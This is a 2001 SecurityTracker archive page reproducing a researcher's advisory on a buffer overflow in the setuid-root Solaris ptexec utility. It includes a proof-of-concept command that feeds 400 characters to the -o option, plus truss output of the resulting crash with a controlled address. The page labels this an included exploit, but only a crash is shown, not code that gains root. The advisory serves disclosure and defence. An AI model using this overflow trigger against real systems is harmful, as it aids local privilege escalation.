Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Solaris Ptexec Utility Lets Local Users Obtain Root Level Privileges on the Host
|
|
SecurityTracker Alert ID: 1001808 |
|
SecurityTracker URL: http://securitytracker.com/id/1001808
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 22 2001
|
Impact:
Execution of arbitrary code via local system, Root access via local system
|
Exploit Included: Yes
|
Version(s): SunOS 5.8 SPARC (not tested on other version)
|
Description:
A vulnerability has been discovered in the Solaris ptexec utility. The security hole allows local users to obtain root level privileges on the host.
The ptexec command, part of the SUNWvts package, reportedly contains a buffer overflow in the -o option that can be triggered with a parameter of 400 characters.
The utility is reportedly installed with setuid root privleges by default.
The vendor has reportedly been notified.
A transcript of an exploit session is provided in the Source Message.
|
Impact:
A local user can cause arbitrary code to be executed on the host, giving the user root level privileges on the host.
|
Solution:
No solution was available at the time of this entry. However, the vendor is reportedly working on developing patches.
|
Vendor URL: sunsolve.sun.com/security (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
UNIX (Solaris - SunOS)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 21 Jun 2001 13:01:02 -0400
Subject: Solaris /opt/SUNWvts/bin/ptexec Vulnerability
|
Vulnerability in Solaris /opt/SUNWvts/bin/ptexec
Date Published: June 21, 2001
Advisory ID: N/A
Bugtraq ID: N/A
CVE CAN: Non currently assigned.
Title: Solaris /opt/SUNWvts/bin/ptexec Buffer Overflow Vulnerability
Class: Boundary Error Condition
Remotely Exploitable: No
Locally Exploitable: Yes
Vulnerability Description:
A problem with the ptexec command included in the SUNWvts package (not
included in the Solaris default instalation) installed setuid root by default,
results in a buffer overflow and potentially the execution of arbitraty code.
Due to the insufficient handling of input by the -o option of ptexec, a
buffer overflow at 400 characters makes it possible to overwrite memory space
of the running process.
Vulnerable Packages/Systems:
SunOS 5.8 SPARC (have not tested on other version)
Solution/Vendor Information/Workaround:
Sun Microsystems was notified on June 12, 2001. Patches are excepted shortly.
Credits:
This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.
This advisory was drafted with the help of the SecurityFocus.com Vulnerability
Help Team. For more information or assistance drafting advisories please mail
vulnhelp@securityfocus.com.
Technical Description :
# uname -a
SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10
# > .sunvts_sec_gss
# /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`
Segmentation Fault (core dumped)
# truss /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`
execve("/opt/SUNWvts/bin/ptexec", 0xFFBEFA44, 0xFFBEFA54) argc = 3
stat("/opt/SUNWvts/bin/ptexec", 0xFFBEF780) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
open("/usr/lib/librpcsvc.so.1", O_RDONLY) = 3
fstat(3, 0xFFBEF518) = 0
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF3A0000
[.....]
sigprocmask(SIG_SETMASK, 0xFF23F010, 0x00000000) = 0
sigaction(SIGSEGV, 0xFFBEE388, 0x00000000) = 0
sigprocmask(SIG_SETMASK, 0xFF24ADE0, 0x00000000) = 0
setcontext(0xFFBEE248)
Incurred fault #6, FLTBOUNDS %pc = 0xFF139FF0
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
--
Pablo Sor
psor@afip.gov.ar, psor@ccc.uba.ar
|
|
Go to the Top of This SecurityTracker Archive Page
|
